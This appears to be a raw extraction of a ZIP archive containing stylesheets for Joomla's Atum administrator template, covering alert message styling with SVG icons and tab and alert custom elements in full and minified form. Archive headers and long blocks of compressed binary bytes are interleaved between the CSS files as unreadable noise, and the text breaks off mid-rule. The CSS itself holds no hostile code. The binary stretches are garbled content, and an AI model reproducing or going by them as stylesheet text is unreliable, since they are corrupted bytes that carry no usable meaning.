  background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M1299 813l-422 422q-19 19-45 19t-45-19l-294-294q-19-19-19-45t19-45l102-102q19-19 45-19t45 19l147 147 275-275q19-19 45-19t45 19l102 102q19 19 19 45t-19 45zm141 83q0-148-73-273t-198-198-273-73-273 73-198 198-73 273 73 273 198 198 273 73 273-73 198-198 73-273zm224 0q0 209-103 385.5t-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103 385.5 103 279.5 279.5 103 385.5z"/></svg>');
  background-size: 100%;
}
#system-message-container joomla-alert .alert-heading .notice::before,
#system-message-container joomla-alert .alert-heading .info::before {
  display: inline-block;
  width: 1em;
  height: 1em;
  content: "";
  background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M256 8C119.043 8 8 119.083 8 256c0 136.997 111.043 248 248 248s248-111.003 248-248C504 119.083 392.957 8 256 8zm0 110c23.196 0 42 18.804 42 42s-18.804 42-42 42-42-18.804-42-42 18.804-42 42-42zm56 254c0 6.627-5.373 12-12 12h-88c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h12v-64h-12c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h64c6.627 0 12 5.373 12 12v100h12c6.627 0 12 5.373 12 12v24z"/></svg>');
  background-size: 100%;
}
#system-message-container joomla-alert .alert-heading .warning::before {
  display: inline-block;
  width: 1em;
  height: 1em;
  content: "";
  background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M1024 1375v-190q0-14-9.5-23.5t-22.5-9.5h-192q-13 0-22.5 9.5t-9.5 23.5v190q0 14 9.5 23.5t22.5 9.5h192q13 0 22.5-9.5t9.5-23.5zm-2-374l18-459q0-12-10-19-13-11-24-11h-220q-11 0-24 11-10 7-10 21l17 457q0 10 10 16.5t24 6.5h185q14 0 23.5-6.5t10.5-16.5zm-14-934l768 1408q35 63-2 126-17 29-46.5 46t-63.5 17h-1536q-34 0-63.5-17t-46.5-46q-37-63-2-126l768-1408q17-31 47-49t65-18 65 18 47 49z"/></svg>');
  background-size: 100%;
}
#system-message-container joomla-alert .alert-heading .error::before,
#system-message-container joomla-alert .alert-heading .danger::before {
  display: inline-block;
  width: 1em;
  height: 1em;
  content: "";
  background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm101.8-262.2L295.6 256l62.2 62.2c4.7 4.7 4.7 12.3 0 17l-22.6 22.6c-4.7 4.7-12.3 4.7-17 0L256 295.6l-62.2 62.2c-4.7 4.7-12.3 4.7-17 0l-22.6-22.6c-4.7-4.7-4.7-12.3 0-17l62.2-62.2-62.2-62.2c-4.7-4.7-4.7-12.3 0-17l22.6-22.6c4.7-4.7 12.3-4.7 17 0l62.2 62.2 62.2-62.2c4.7-4.7 12.3-4.7 17 0l22.6 22.6c4.7 4.7 4.7 12.3 0 17z"/></svg>');
  background-size: 100%;
}
#system-message-container joomla-alert .alert-wrapper {
  width: 100%;
}
#system-message-container joomla-alert .alert-link {
  color: var(--template-link-color);
  text-decoration: underline;
}
#system-message-container joomla-alert[type=success], #system-message-container joomla-alert[type=message] {
  --alert-accent-color: #457d54;
  --alert-bg-color: #f2f8f4;
}
#system-message-container joomla-alert[type=info], #system-message-container joomla-alert[type=notice] {
  --alert-accent-color: var(--template-bg-dark-70);
  --alert-bg-color: var(--white);
}
#system-message-container joomla-alert[type=warning] {
  color: #996900;
  --alert-accent-color: #ffb514;
  --alert-bg-color: #fffcf4;
}
#system-message-container joomla-alert[type=warning] .joomla-alert--close {
  color: #996900;
}
#system-message-container joomla-alert[type=error], #system-message-container joomla-alert[type=danger] {
  --alert-accent-color: #c52827;
  --alert-bg-color: #fef8f8;
}
#system-message-container joomla-alert .joomla-alert--close,
#system-message-container joomla-alert .joomla-alert-button--close {
  position: absolute;
  top: 0;
  right: 0;
  padding: 0.75rem 0.8rem;
  font-size: 2rem;
  line-height: 1rem;
  color: var(--alert-accent-color);
  background: none;
  border: 0;
  opacity: 1;
}
#system-message-container joomla-alert .joomla-alert--close:hover, #system-message-container joomla-alert .joomla-alert--close:focus,
#system-message-container joomla-alert .joomla-alert-button--close:hover,
#system-message-container joomla-alert .joomla-alert-button--close:focus {
  text-decoration: none;
  cursor: pointer;
  opacity: 0.75;
}
[dir=rtl] #system-message-container joomla-alert .joomla-alert--close,
[dir=rtl] #system-message-container joomla-alert .joomla-alert-button--close {
  right: auto;
  left: 0;
}
#system-message-container joomla-alert div {
  font-size: 1rem;
}
#system-message-container joomla-alert div .alert-message {
  padding: 0.15rem 0.3rem;
  -webkit-padding-end: 2rem;
          padding-inline-end: 2rem;
  margin: 0.5rem;
}
#system-message-container joomla-alert div .alert-message:not(:first-of-type) {
  border-top: 1px solid var(--alert-accent-color);
}PK!���"�"5atum/css/vendor/joomla-custom-elements/joomla-tab.cssnu&1i�joomla-tab {
  display: flex;
  flex-direction: column;
}
joomla-tab[orientation=horizontal]:not([view=accordion]) {
  margin-bottom: 0;
}
joomla-tab[orientation=horizontal]:not([view=accordion]) div[role=tablist] {
  width: 100%;
  margin-bottom: 0;
}
joomla-tab > div[role=tablist] {
  display: flex;
  flex-flow: wrap;
  padding: 0;
  white-space: nowrap;
  list-style: outside none none;
  border-bottom: 1px solid var(--template-bg-dark-10);
}
joomla-tab > div[role=tablist] button[role=tab] {
  position: relative;
  box-sizing: border-box;
  display: block;
  padding: 0.6rem 1rem;
  color: var(--primary);
  text-decoration: none;
  background-color: var(--white);
  border: 0;
  border-top: 0;
  border-right: 0;
  border-bottom: 0;
  box-shadow: none;
}
joomla-tab > div[role=tablist] button[role=tab]:focus-visible {
  z-index: 1;
}
joomla-tab > div[role=tablist] button[role=tab][aria-expanded=true], joomla-tab > div[role=tablist] button[role=tab]:focus, joomla-tab > div[role=tablist] button[role=tab]:hover {
  border: 0;
  border-radius: 0;
  box-shadow: none;
}
joomla-tab > div[role=tablist] button[role=tab][aria-expanded=true]::after, joomla-tab > div[role=tablist] button[role=tab]:focus::after, joomla-tab > div[role=tablist] button[role=tab]:hover::after {
  position: absolute;
  right: 0;
  bottom: 0;
  left: 0;
  height: 3px;
  content: "";
  background-color: var(--template-link-color);
  opacity: 0.8;
}
joomla-tab > div[role=tablist] button[role=tab][aria-expanded=true] .text-muted, joomla-tab > div[role=tablist] button[role=tab]:focus .text-muted, joomla-tab > div[role=tablist] button[role=tab]:hover .text-muted {
  color: var(--template-text-light) !important;
}
joomla-tab > div[role=tablist] button[role=tab][aria-expanded=true] {
  font-weight: 700;
  background: var(--template-bg-dark-3);
}
joomla-tab > div[role=tablist] button[role=tab] .text-muted {
  color: var(--template-text-dark) !important;
}
joomla-tab > button[role=region] {
  width: 100%;
  padding: 0.7rem;
  color: var(--template-text-light);
  text-align: start;
  background-color: var(--template-link-color);
  border: 1px solid var(--template-text-light);
  border-top: 0;
}
joomla-tab > button[role=region][aria-expanded=true], joomla-tab > button[role=region]:hover, joomla-tab > button[role=region]:focus {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark);
}
joomla-tab > button[role=region] .text-muted {
  color: var(--template-text-light) !important;
}
joomla-tab > joomla-tab-element {
  --gutter-x: 2rem;
  display: none;
  padding: 30px 2vw;
  background-color: #fff;
  border: 0;
  border-radius: 0.25rem;
  box-shadow: none;
}
joomla-tab > joomla-tab-element[active] {
  display: block;
}
joomla-tab[orientation=vertical] {
  flex-direction: row;
  align-items: flex-start;
  width: 100%;
}
joomla-tab[orientation=vertical] > div[role=tablist] {
  flex: 0 0 25%;
  flex-direction: column;
  width: 100%;
  min-width: 25%;
  max-width: 25%;
  height: auto;
  padding: 0;
  overflow: hidden;
  border: 1px solid #dee2e6;
  border-radius: 0;
  box-shadow: none;
}
@media (max-width: 991.98px) {
  joomla-tab[orientation=vertical] > div[role=tablist] {
    flex: 0 0 100%;
    max-width: 100%;
  }
}
joomla-tab[orientation=vertical] > div[role=tablist] button[role=tab] {
  text-align: start;
}
joomla-tab[orientation=vertical] > div[role=tablist] button[role=tab][aria-expanded=true] {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark-60);
}
joomla-tab[orientation=vertical] button[role=tab]:last-of-type {
  border-bottom: 0;
}
joomla-tab[orientation=vertical] button[role=tab] {
  position: relative;
  display: block;
  padding: 0.75em 1em;
  margin: -1px 0;
  color: var(--template-special-color);
  text-decoration: none;
  border-top: 1px solid transparent;
  border-bottom: 1px solid #dee2e6;
  box-shadow: none;
}
joomla-tab[orientation=vertical] button[role=tab][aria-expanded=true], joomla-tab[orientation=vertical] button[role=tab]:focus, joomla-tab[orientation=vertical] button[role=tab]:hover {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark-60);
  background-image: none;
  border-right: 0;
  box-shadow: none;
}
joomla-tab[orientation=vertical] button[role=tab][aria-expanded=true]::after, joomla-tab[orientation=vertical] button[role=tab]:focus::after, joomla-tab[orientation=vertical] button[role=tab]:hover::after {
  top: 0;
  bottom: 0;
  left: -1px;
  width: 5px;
  height: auto;
  background-color: var(--template-bg-dark);
}
joomla-tab[orientation=vertical] button[role=tab][aria-expanded=true] .text-muted, joomla-tab[orientation=vertical] button[role=tab]:focus .text-muted, joomla-tab[orientation=vertical] button[role=tab]:hover .text-muted {
  color: var(--template-text-light) !important;
}
joomla-tab[orientation=vertical] button[role=tab] .text-muted {
  color: var(--template-text-dark) !important;
}
joomla-tab[orientation=vertical] > joomla-tab-element {
  width: 100%;
  padding: 15px 0 15px 15px;
  border: 0 none;
  box-shadow: none;
}
joomla-tab[view=accordion] {
  flex-direction: column;
  white-space: normal;
  border-radius: 0;
  box-shadow: 0 1px #fff inset, 0 0 3px rgba(0, 0, 0, 0.04);
}
joomla-tab[view=accordion] joomla-tab-element {
  display: none;
  padding: 15px;
}
joomla-tab[view=accordion] joomla-tab-element[active] {
  display: block;
  width: 100%;
  max-width: 100%;
  border-bottom: 1px solid #dee2e6;
}
joomla-tab[view=accordion] [active],
joomla-tab[view=accordion] [aria-expanded=true] {
  background-color: #fff;
}
joomla-tab[view=accordion] .col-md-6,
joomla-tab[view=accordion] .col-md-9,
joomla-tab[view=accordion] .col-md-3 {
  padding: 0.5rem 0 0 !important;
}
joomla-tab[view=accordion] joomla-tab[view=accordion] > div[role=tablist] {
  background-color: #fff;
}
joomla-tab[view=accordion] joomla-tab[view=accordion] button[role=tab] {
  position: relative;
  display: block;
  padding: 0.75em 1em;
  color: var(--template-text-light);
  text-align: start;
  text-decoration: none;
  border: 0;
  border-bottom: 1px solid #dee2e6;
  box-shadow: none;
}
joomla-tab[view=accordion] joomla-tab[view=accordion] button[role=tab][aria-expanded=true]::after, joomla-tab[view=accordion] joomla-tab[view=accordion] button[role=tab]:hover::after {
  position: absolute;
  top: auto;
  right: -1px;
  bottom: -1px;
  left: -1px;
  display: block;
  width: calc(100% + 2px);
  height: 5px;
  content: "";
  background-color: var(--template-bg-dark);
  opacity: 0.8;
}
joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] {
  padding: 0 !important;
}
@media (max-width: 991.98px) {
  joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] {
    /* stylelint-disable */
    /* stylelint-enable */
  }
  [dir=ltr] joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable {
    text-align: right;
  }
  [dir=rtl] joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable {
    text-align: left;
  }
  joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable, joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable thead, joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable tbody, joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable tr, joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable th, joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable td {
    display: block;
  }
  joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable thead {
    position: absolute;
    top: -1111px;
    left: -1111px;
  }
  joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable td::before {
    font-weight: 700;
    content: attr(data-label) ":";
  }
  [dir=ltr] joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable td::before {
    float: left;
    padding: 0 2em 0 0;
  }
  [dir=rtl] joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable td::before {
    float: right;
    padding: 0 0 0 2em;
  }
  joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable td:nth-child(1) {
    font-weight: 700;
  }
  joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .respTable td:last-child {
    border-bottom: 1em var(--template-bg-dark-80) solid;
  }
  joomla-tab[view=accordion] #permissions-sliders > joomla-tab-element[active] .oddCol {
    background: var(--template-bg-light);
  }
}
.main-card-columns > * > joomla-tab {
  height: 100%;
  border-left: 1px solid var(--template-bg-dark-10);
}PK!�H��WW<atum/css/vendor/joomla-custom-elements/joomla-tab.min.css.gznu&1i���Y�n�8��L�#�F�zIԣ���
����G��5��g�!$%�i�7��{�e�[��c�����ӭ��0I}�D���h��8{.$����_F�É��׌nޱ�I��0
�\�yB):�Ղ,��s)8}���%�#�0���Ķ��Z~U�U�
��8�c7Ƅ�h���f�EI�}
��z9JԎSG�T��"e�K��M��[+�k��!EC�	�"X~��=l���V (:��#�E�LJ$Il�UnQ¾��G�[7w���<:4~�4�&�p!�B:�]�d���Ut��o�'�	��)VA�E&4Ã���r%�b �b��a����%&p��[�@���Y�<N�/�"B���)�nk�bMe�5s,Ftc���+���i�$&l��'0TW#3ǮYY�^&�(U�&X)��p�N=^R��)�BYF
�yxh���&�,���];���3~�&d��~6�kw���𕥥����\�l�c!���� �h�%�ŶKp�#~]蛖��ZY����=�t/� W��0"'QX�NEw�ō(_VTF�3�T��nR�j&�&�lL΅��7�P��GD9
R��
"�u�:�y�3�*O��
)��7UW� p�w<�i�-\�g�}݄:a�m���)��IO���T!��&���� ��>+���hA�m��t���Թe�)��!ޖF��+%J�H��MKF��[�P:��g��!%[�B���d��o��-~�a.���@V��)r�Ch��=#��FV�@wE��.��	��.���60՗�f��3V� ]Sv=�'1��9.׳����TG@�%X�H݋
n…KCy�뗮;���^M�p�X�o�.��]�V!���w��z�t�TV�Pg𩌙Wt�N�iࠝ�t��~���o&�
�]CAj��d���2�L1���r#mh��n d�y[/eQB���\g�{ ��,����߱�s�b�U�r-�Ҏv�Sϖ�1�o��&�i�u�Z�ԝ��8c��1LC!AO�&=_2�-=�AMI!�v}�6���U
G��h˫;��g��>_�s���op���� ����J��d��4�C��M��A�<�w���5�w�Y������_�T~��Y�� A	�ʤ�u<~�6E�a��Εl�zG#���I�/�7���4Q��R�A���-�^�Z�dחlҗ�eo�)��h�|+qo�M�@3���x4�Vn1s��J��
#�=ʇփ���fq��ٯ��5ͺ{߈Q1��T�sED�r0�(�/'�	�O����t��{�s���f	B�<m�P�h�~?1�����pH~�Y�zr� ��uѷ���
qw�PK!�
qw��9atum/css/vendor/joomla-custom-elements/joomla-tab.min.cssnu&1i�joomla-tab{display:flex;flex-direction:column}joomla-tab[orientation=horizontal]:not([view=accordion]){margin-bottom:0}joomla-tab[orientation=horizontal]:not([view=accordion]) div[role=tablist]{width:100%;margin-bottom:0}joomla-tab>div[role=tablist]{display:flex;flex-flow:wrap;padding:0;white-space:nowrap;list-style:outside none none;border-bottom:1px solid var(--template-bg-dark-10)}joomla-tab>div[role=tablist] button[role=tab]{position:relative;box-sizing:border-box;display:block;padding:.6rem 1rem;color:var(--primary);text-decoration:none;background-color:var(--white);border:0;border-top:0;border-right:0;border-bottom:0;box-shadow:none}joomla-tab>div[role=tablist] button[role=tab]:focus-visible{z-index:1}joomla-tab>div[role=tablist] button[role=tab]:focus,joomla-tab>div[role=tablist] button[role=tab]:hover,joomla-tab>div[role=tablist] button[role=tab][aria-expanded=true]{border:0;border-radius:0;box-shadow:none}joomla-tab>div[role=tablist] button[role=tab]:focus:after,joomla-tab>div[role=tablist] button[role=tab]:hover:after,joomla-tab>div[role=tablist] button[role=tab][aria-expanded=true]:after{position:absolute;right:0;bottom:0;left:0;height:3px;content:"";background-color:var(--template-link-color);opacity:.8}joomla-tab>div[role=tablist] button[role=tab]:focus .text-muted,joomla-tab>div[role=tablist] button[role=tab]:hover .text-muted,joomla-tab>div[role=tablist] button[role=tab][aria-expanded=true] .text-muted{color:var(--template-text-light)!important}joomla-tab>div[role=tablist] button[role=tab][aria-expanded=true]{font-weight:700;background:var(--template-bg-dark-3)}joomla-tab>div[role=tablist] button[role=tab] .text-muted{color:var(--template-text-dark)!important}joomla-tab>button[role=region]{width:100%;padding:.7rem;color:var(--template-text-light);text-align:start;background-color:var(--template-link-color);border:1px solid var(--template-text-light);border-top:0}joomla-tab>button[role=region]:focus,joomla-tab>button[role=region]:hover,joomla-tab>button[role=region][aria-expanded=true]{color:var(--template-text-light);background-color:var(--template-bg-dark)}joomla-tab>button[role=region] .text-muted{color:var(--template-text-light)!important}joomla-tab>joomla-tab-element{--gutter-x:2rem;display:none;padding:30px 2vw;background-color:#fff;border:0;border-radius:.25rem;box-shadow:none}joomla-tab>joomla-tab-element[active]{display:block}joomla-tab[orientation=vertical]{flex-direction:row;align-items:flex-start;width:100%}joomla-tab[orientation=vertical]>div[role=tablist]{flex:0 0 25%;flex-direction:column;width:100%;min-width:25%;max-width:25%;height:auto;padding:0;overflow:hidden;border:1px solid #dee2e6;border-radius:0;box-shadow:none}@media (max-width:991.98px){joomla-tab[orientation=vertical]>div[role=tablist]{flex:0 0 100%;max-width:100%}}joomla-tab[orientation=vertical]>div[role=tablist] button[role=tab]{text-align:start}joomla-tab[orientation=vertical]>div[role=tablist] button[role=tab][aria-expanded=true]{color:var(--template-text-light);background-color:var(--template-bg-dark-60)}joomla-tab[orientation=vertical] button[role=tab]:last-of-type{border-bottom:0}joomla-tab[orientation=vertical] button[role=tab]{position:relative;display:block;padding:.75em 1em;margin:-1px 0;color:var(--template-special-color);text-decoration:none;border-top:1px solid transparent;border-bottom:1px solid #dee2e6;box-shadow:none}joomla-tab[orientation=vertical] button[role=tab]:focus,joomla-tab[orientation=vertical] button[role=tab]:hover,joomla-tab[orientation=vertical] button[role=tab][aria-expanded=true]{color:var(--template-text-light);background-color:var(--template-bg-dark-60);background-image:none;border-right:0;box-shadow:none}joomla-tab[orientation=vertical] button[role=tab]:focus:after,joomla-tab[orientation=vertical] button[role=tab]:hover:after,joomla-tab[orientation=vertical] button[role=tab][aria-expanded=true]:after{top:0;bottom:0;left:-1px;width:5px;height:auto;background-color:var(--template-bg-dark)}joomla-tab[orientation=vertical] button[role=tab]:focus .text-muted,joomla-tab[orientation=vertical] button[role=tab]:hover .text-muted,joomla-tab[orientation=vertical] button[role=tab][aria-expanded=true] .text-muted{color:var(--template-text-light)!important}joomla-tab[orientation=vertical] button[role=tab] .text-muted{color:var(--template-text-dark)!important}joomla-tab[orientation=vertical]>joomla-tab-element{width:100%;padding:15px 0 15px 15px;border:0;box-shadow:none}joomla-tab[view=accordion]{flex-direction:column;white-space:normal;border-radius:0;box-shadow:inset 0 1px #fff,0 0 3px rgba(0,0,0,.04)}joomla-tab[view=accordion] joomla-tab-element{display:none;padding:15px}joomla-tab[view=accordion] joomla-tab-element[active]{display:block;width:100%;max-width:100%;border-bottom:1px solid #dee2e6}joomla-tab[view=accordion] [active],joomla-tab[view=accordion] [aria-expanded=true]{background-color:#fff}joomla-tab[view=accordion] .col-md-3,joomla-tab[view=accordion] .col-md-6,joomla-tab[view=accordion] .col-md-9{padding:.5rem 0 0!important}joomla-tab[view=accordion] joomla-tab[view=accordion]>div[role=tablist]{background-color:#fff}joomla-tab[view=accordion] joomla-tab[view=accordion] button[role=tab]{position:relative;display:block;padding:.75em 1em;color:var(--template-text-light);text-align:start;text-decoration:none;border:0;border-bottom:1px solid #dee2e6;box-shadow:none}joomla-tab[view=accordion] joomla-tab[view=accordion] button[role=tab]:hover:after,joomla-tab[view=accordion] joomla-tab[view=accordion] button[role=tab][aria-expanded=true]:after{position:absolute;top:auto;right:-1px;bottom:-1px;left:-1px;display:block;width:calc(100% + 2px);height:5px;content:"";background-color:var(--template-bg-dark);opacity:.8}joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active]{padding:0!important}@media (max-width:991.98px){[dir=ltr] joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable{text-align:right}[dir=rtl] joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable{text-align:left}joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable,joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable tbody,joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable td,joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable th,joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable thead,joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable tr{display:block}joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable thead{position:absolute;top:-1111px;left:-1111px}joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable td:before{font-weight:700;content:attr(data-label) ":"}[dir=ltr] joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable td:before{float:left;padding:0 2em 0 0}[dir=rtl] joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable td:before{float:right;padding:0 0 0 2em}joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable td:first-child{font-weight:700}joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .respTable td:last-child{border-bottom:1em solid var(--template-bg-dark-80)}joomla-tab[view=accordion] #permissions-sliders>joomla-tab-element[active] .oddCol{background:var(--template-bg-light)}}.main-card-columns>*>joomla-tab{height:100%;border-left:1px solid var(--template-bg-dark-10)}PK!X��w2	2	>atum/css/vendor/joomla-custom-elements/joomla-alert.min.css.gznu&1i���Z[s�8�+Z���]�hI�q�kj�u�i�����`p�I\��{t���K2U[5��ѧ��ùI�e��#�jv��d���o��Y��!��Y�m%IV,Bө�
Q���bU��	"�
���*�UH�Ϩ.�,AM�:�xьq%٦GƉ�l5YY�dS��>i2����"�H��4�����x\�e���z�!�!y�X6�]��L��c^�
�1˶�5��G�â*7E҂���I0V:�8J�8�Y���(c��,+Ҳm&�c��yD0�㔎 R�9w�����,����FU!��Fx��`q,X�4����9��d���,N����X�x���Ӏ�$IF��f�0�1\_4;�	�ϒ�^��K8��a��ק��2�Ɇ���u�C����δ/��dc��ә��C�"���vj}|��n5Z����Q�?dp�������~YNs:@�ԗ�s���Ewd��0���uYgr����Ϛrbi�J6��4/�&��ΆL&mE6��앇Tu��-�L<�`�/�;�)c>�އ���w:k�30_FI���"L��w�ʠl��&�9d��4�\ɬ\Gqּ@�8��0-c���e�ī�
�Lx\j�,ʂ��MU�u�
���zCi�j^�^�'�$C社�����T����:wMߙZV;��򳙛���gԵ���N�c�E�;��}�5t��@�9��9��ʏ�����I�/R�
lϫ��60tm0�R��SjT�� .����u�e�U��4ޛ�E*���y�>�.|��R��Ց���4�f2t�tF�#U����wfp��od}^�G��+��۲Y�%Yu_5�t6��u��I_�hӔ���G^��~k����Vъ��8�Qg��/�6#���߮C_22�n�)/�\�O�}YW<�U�+�lb��U�K"�:���O��tU�+[�˪���8x{��_ꆯ0�^G�P4�H�`&#%Z[��9�����Ko
@]�9�"����`�r�o����d��I��H
��S�'=Z��b�}��>���
Îm�jN)GVdR�F�Ҍ�ܺ�GB[��v�
��qU����U1����,}�A�PLJ��(���/D��@%mq0�mSD���s��7n��#ͥS\V�J_�K�=�>��_�FMb2������/�&Q��k�����*�m��7���,�'��)���SƷ�)��'rY
$����'˦Y�_�n�[sk�e��ʠ�CL�[G��Y��O��<���@��8�	J�'��,�O�ی!�1

���x�1lq�F�g;���0ף$#�od�������d_����¼��M�o=Lm{p�D�//x�4?@A�
o�"4�GŠ*��1�G�鈅,�1A����K�i�'S�޵�1�׎�^�C�Ե�N�~�&��_�I-D!*��"�(���Gb���e�d�`����)
Lb[ȇ�����[Z�`�J�����’N$��C쎇0�S����v���2i�œl�
��-<�����kV��E5���-sl�5]�aǴ�@/��%���N�T3��O lLtcKW=��յ��xKo׎u'$>���������Vf�mΡ���O �Q�s� g��Y����s r�_Y�P Ze�ܓ�	A���-E?�
������
3lyvN}H ���JdbS�`>p_�xF�bd�5A��1�Sr�'�V��;�q}�4��¢�~]9���e��l��r��L���AJ ������h���GlOI\#Qp����+�bɕzآ��4.t��|� ;��Y-�>�yU��?4̷!^���w?�#��`��X��m�O�06a��`_<�/R[�~�]����|�5D
�4Z�BD�	#��d��1e�\�"q�m�I_����pSW8�c݊e�|����@����8Vq���R�Fʃ��S�=/�&�Vb�N�g5���qT	��b�*Z�y�ۯO�dp��ҭ��['�[� 2���]8�ڽј�5�����u\x�6q����8�KY�U�ɝԫ�S��	��ט�#�cq�ثd>ت�7���c�JӹCG������o���x
�������3��p�Bb����4�/��������	���h^���Qg�D��v�'�ծ�P���o;
�H����!��Z���G8�s�OP�GD2R'�מ�?bf����i�;~;��g�o4rי5Ufm�t��}u#�`���NJu������'�_���YU7�L�)����;�ӷ��^�f�%PK!�^�f�%�%;atum/css/vendor/joomla-custom-elements/joomla-alert.min.cssnu&1i�joomla-alert{--jui-alert-min-width:250px;--jui-alert-padding:.5rem 1.25rem;--jui-alert-margin:0 0 1rem 0;--jui-alert-border:1px solid transparent;--jui-alert-border-radius:.25rem;--jui-alert-animation-duration:.5s;--jui-alert-animation-timing-function:ease-in-out;--jui-alert-button-color-dark:#000;--jui-alert-button-color-light:#fff;--jui-alert-success-color:#234423;--jui-alert-success-background-color:#d9e6d9;--jui-alert-success-border-color:#cadcca;--jui-alert-success-link-color:#122212;--jui-alert-info-color:#0c5460;--jui-alert-info-background-color:#d1ecf1;--jui-alert-info-border-color:#bee5eb;--jui-alert-info-link-color:#062c33;--jui-alert-warning-color:#7d5a29;--jui-alert-warning-background-color:#fcefdc;--jui-alert-warning-border-color:#fbe8cd;--jui-alert-warning-link-color:#573e1c;--jui-alert-danger-color:#712b29;--jui-alert-danger-background-color:#f7dddc;--jui-alert-danger-border-color:#f4cfce;--jui-alert-danger-link-color:#4c1d1b;display:block;min-width:var(--jui-alert-min-width,250px);padding:var(--jui-alert-padding,.5rem 1.25rem);margin:var(--jui-alert-margin,0 0 1rem 0);border:var(--jui-alert-border,1px solid transparent);border-radius:var(--jui-alert-border-radius,.25rem);-webkit-animation-duration:var(--jui-alert-animation-duration,.5s);animation-duration:var(--jui-alert-animation-duration,.5s);-webkit-animation-timing-function:var(--jui-alert-animation-timing-function,ease-in-out);animation-timing-function:var(--jui-alert-animation-timing-function,ease-in-out)}joomla-alert .joomla-alert--close{position:relative;top:-.5rem;right:-1.25rem;float:right;padding:.2rem 1rem;font-size:1.5rem;font-weight:700;line-height:1;color:var(--jui-alert-button-color-dark,#000);text-shadow:0 1px 0 var(--jui-alert-button-color-light,#fff);background:transparent;border:0;opacity:.5}joomla-alert .joomla-alert--close:focus,joomla-alert .joomla-alert--close:hover{color:var(--jui-alert-button-color-dark,#000);text-decoration:none;cursor:pointer;opacity:.75}joomla-alert[type=success]{color:var(--jui-alert-success-color,#234423);background-color:var(--jui-alert-success-background-color,#d9e6d9);border-color:var(--jui-alert-success-border-color,#cadcca)}joomla-alert[type=success] hr{border-top-color:var(--jui-alert-success-border-color,#cadcca)}joomla-alert[type=success] .alert-link{color:var(--jui-alert-success-link-color,#122212)}joomla-alert[type=info]{color:var(--jui-alert-info-color,#0c5460);background-color:var(--jui-alert-info-background-color,#d1ecf1);border-color:var(--jui-alert-info-border-color,#bee5eb)}joomla-alert[type=info] hr{border-top-color:var(--jui-alert-info-border-color,#bee5eb)}joomla-alert[type=info] .alert-link{color:var(--jui-alert-info-link-color,#062c33)}joomla-alert[type=warning]{color:var(--jui-alert-warning-color,#7d5a29);background-color:var(--jui-alert-warning-background-color,#fcefdc);border-color:var(--jui-alert-warning-border-color,#fbe8cd)}joomla-alert[type=warning] hr{border-top-color:var(--jui-alert-warning-border-color,#fbe8cd)}joomla-alert[type=warning] .alert-link{color:var(--jui-alert-warning-link-color,#573e1c)}joomla-alert[type=danger]{color:var(--jui-alert-danger-color,#712b29);background-color:var(--jui-alert-danger-background-color,#f7dddc);border-color:var(--jui-alert-danger-border-color,#f4cfce)}joomla-alert[type=danger] hr{border-top-color:var(--jui-alert-danger-border-color,#f4cfce)}joomla-alert[type=danger] .alert-link{color:var(--jui-alert-danger-link-color,#4c1d1b)}html[dir=rtl] joomla-alert .joomla-alert--close,html[dir=rtl] joomla-alert .joomla-alert-button--close{right:auto;left:-1.25rem;float:left}@-webkit-keyframes joomla-alert-fade-in{0%{opacity:0}}@keyframes joomla-alert-fade-in{0%{opacity:0}}@-webkit-keyframes joomla-alert-fade-out{0%{opacity:1}to{opacity:0}}@keyframes 